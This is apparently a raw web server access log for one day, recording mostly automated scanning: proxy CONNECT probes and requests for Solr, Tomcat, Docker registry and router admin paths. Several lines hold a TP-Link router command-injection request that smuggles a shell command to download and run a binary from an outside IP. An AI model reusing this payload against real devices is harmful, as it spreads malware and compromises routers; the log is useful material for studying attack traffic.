206.168.32.3 - - [26/Apr/2024:00:18:26 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [26/Apr/2024:00:18:29 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [26/Apr/2024:00:18:29 +0200] "GET /favicon.ico HTTP/1.1" 404 729 80.75.212.75 - - [26/Apr/2024:00:33:32 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 87.121.69.25 - - [26/Apr/2024:00:38:00 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 185.224.128.17 - - [26/Apr/2024:00:51:15 +0200] "-" 400 1930 185.224.128.17 - - [26/Apr/2024:00:51:15 +0200] "-" 400 1930 185.224.128.17 - - [26/Apr/2024:00:51:15 +0200] "CONNECT example.com:80 HTTP/1.1" 400 804 87.121.69.52 - - [26/Apr/2024:01:38:39 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 65.49.1.35 - - [26/Apr/2024:02:39:44 +0200] "GET / HTTP/1.1" 200 1895 65.49.1.31 - - [26/Apr/2024:02:40:02 +0200] "GET /favicon.ico HTTP/1.1" 404 729 65.49.1.33 - - [26/Apr/2024:02:40:14 +0200] "GET /?format=json HTTP/1.1" 200 1895 65.49.1.31 - - [26/Apr/2024:02:40:18 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 64.62.197.47 - - [26/Apr/2024:03:07:21 +0200] "-" 400 1930 80.75.212.75 - - [26/Apr/2024:03:07:22 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 179.43.190.218 - - [26/Apr/2024:04:12:30 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 185.117.3.187 - - [26/Apr/2024:04:16:56 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.191.126.213 - - [26/Apr/2024:05:22:57 +0200] "GET / HTTP/1.1" 200 1895 121.151.243.113 - - [26/Apr/2024:05:27:20 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 206.168.32.3 - - [26/Apr/2024:05:29:50 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [26/Apr/2024:05:29:53 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [26/Apr/2024:05:29:54 +0200] "GET /favicon.ico HTTP/1.1" 404 729 146.19.24.28 - - [26/Apr/2024:06:14:29 +0200] "GET / HTTP/1.1" 200 1895 45.142.182.92 - - [26/Apr/2024:06:42:18 +0200] "GET null HTTP/1.1" 400 1994 87.121.69.52 - - [26/Apr/2024:07:28:24 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 205.210.31.82 - - [26/Apr/2024:07:40:26 +0200] "GET / HTTP/1.0" 200 1895 45.142.182.92 - - [26/Apr/2024:07:44:40 +0200] "GET null HTTP/1.1" 400 1994 172.104.242.173 - - [26/Apr/2024:07:50:25 +0200] "-" 400 1930 80.75.212.75 - - [26/Apr/2024:08:18:04 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 106.75.95.40 - - [26/Apr/2024:08:26:40 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.50 - - [26/Apr/2024:08:35:41 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.50 - - [26/Apr/2024:08:35:45 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.50 - - [26/Apr/2024:08:35:46 +0200] "GET /favicon.ico HTTP/1.1" 404 729 60.191.125.35 - - [26/Apr/2024:08:47:01 +0200] "HEAD / HTTP/1.1" 200 - 192.241.214.4 - - [26/Apr/2024:09:26:32 +0200] "GET / HTTP/1.1" 200 1895 103.237.87.90 - - [26/Apr/2024:09:29:28 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 94.156.8.84 - - [26/Apr/2024:09:33:02 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 198.235.24.59 - - [26/Apr/2024:10:01:14 +0200] "GET / HTTP/1.1" 200 1895 179.43.190.218 - - [26/Apr/2024:10:03:37 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 197.210.129.150 - - [26/Apr/2024:10:29:06 +0200] "GET / HTTP/1.1" 200 1895 152.32.139.9 - - [26/Apr/2024:10:42:24 +0200] "-" 400 1930 152.32.139.9 - - [26/Apr/2024:10:42:35 +0200] "GET / HTTP/1.1" 200 1895 152.32.139.9 - - [26/Apr/2024:10:42:53 +0200] "GET /favicon.ico HTTP/1.1" 404 729 152.32.139.9 - - [26/Apr/2024:10:42:54 +0200] "GET /robots.txt HTTP/1.1" 404 728 152.32.139.9 - - [26/Apr/2024:10:42:55 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 45.142.182.92 - - [26/Apr/2024:11:18:26 +0200] "GET null HTTP/1.1" 400 1994 170.82.181.46 - - [26/Apr/2024:12:21:05 +0200] "GET / HTTP/1.1" 200 1895 155.133.23.58 - - [26/Apr/2024:12:26:22 +0200] "GET / HTTP/1.0" 200 1895 146.19.24.28 - - [26/Apr/2024:13:00:46 +0200] "GET / HTTP/1.1" 200 1895 198.235.24.91 - - [26/Apr/2024:13:23:12 +0200] "GET / HTTP/1.1" 200 1895 45.142.182.92 - - [26/Apr/2024:13:24:11 +0200] "GET null HTTP/1.1" 400 1994 87.121.69.52 - - [26/Apr/2024:13:32:59 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 164.90.215.90 - - [26/Apr/2024:13:53:20 +0200] "GET / HTTP/1.0" 200 1895 104.248.242.252 - - [26/Apr/2024:13:53:20 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 723 64.227.114.74 - - [26/Apr/2024:13:53:20 +0200] "GET /v2/_catalog HTTP/1.1" 404 733 68.183.213.31 - - [26/Apr/2024:13:53:20 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 743 64.226.77.178 - - [26/Apr/2024:13:53:20 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 752 64.227.114.74 - - [26/Apr/2024:13:53:20 +0200] "-" 400 1930 64.226.77.178 - - [26/Apr/2024:13:53:20 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 742 64.227.114.74 - - [26/Apr/2024:13:53:20 +0200] "-" 400 1930 64.227.114.74 - - [26/Apr/2024:13:53:20 +0200] "-" 400 1930 103.48.84.50 - - [26/Apr/2024:15:30:16 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 179.43.190.218 - - [26/Apr/2024:15:43:45 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 91.92.245.67 - - [26/Apr/2024:16:10:34 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 174.138.2.203 - - [26/Apr/2024:16:13:37 +0200] "GET /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [26/Apr/2024:16:13:38 +0200] "GET /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [26/Apr/2024:16:43:01 +0200] "GET /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [26/Apr/2024:16:43:02 +0200] "GET /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [26/Apr/2024:16:58:37 +0200] "GET /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [26/Apr/2024:16:58:38 +0200] "GET /dr/tomcat.jsp HTTP/1.1" 404 735 45.142.182.92 - - [26/Apr/2024:17:19:08 +0200] "GET null HTTP/1.1" 400 1994 174.138.2.203 - - [26/Apr/2024:17:35:33 +0200] "GET /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [26/Apr/2024:17:35:34 +0200] "GET /dr/tomcat.jsp HTTP/1.1" 404 735 206.168.32.3 - - [26/Apr/2024:17:36:06 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [26/Apr/2024:17:36:10 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [26/Apr/2024:17:36:10 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.142.182.70 - - [26/Apr/2024:17:43:23 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 198.199.119.89 - - [26/Apr/2024:19:15:37 +0200] "-" 400 1930 146.19.24.28 - - [26/Apr/2024:19:36:42 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.52 - - [26/Apr/2024:19:39:47 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.180.143.79 - - [26/Apr/2024:20:45:46 +0200] "GET / HTTP/1.1" 200 1895 45.142.182.92 - - [26/Apr/2024:20:52:11 +0200] "GET null HTTP/1.1" 400 1994 179.43.190.218 - - [26/Apr/2024:20:53:29 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 45.142.182.92 - - [26/Apr/2024:21:41:52 +0200] "GET null HTTP/1.1" 400 1994 94.156.71.249 - - [26/Apr/2024:22:23:16 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 45.142.182.92 - - [26/Apr/2024:22:26:28 +0200] "GET null HTTP/1.1" 400 1994 206.168.32.3 - - [26/Apr/2024:22:26:53 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [26/Apr/2024:22:26:56 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [26/Apr/2024:22:26:57 +0200] "GET /favicon.ico HTTP/1.1" 404 729 78.108.177.50 - - [26/Apr/2024:22:46:16 +0200] "GET / HTTP/1.0" 200 1895 45.142.182.70 - - [26/Apr/2024:23:02:15 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 168.232.15.100 - - [26/Apr/2024:23:30:48 +0200] "GET / HTTP/1.1" 200 1895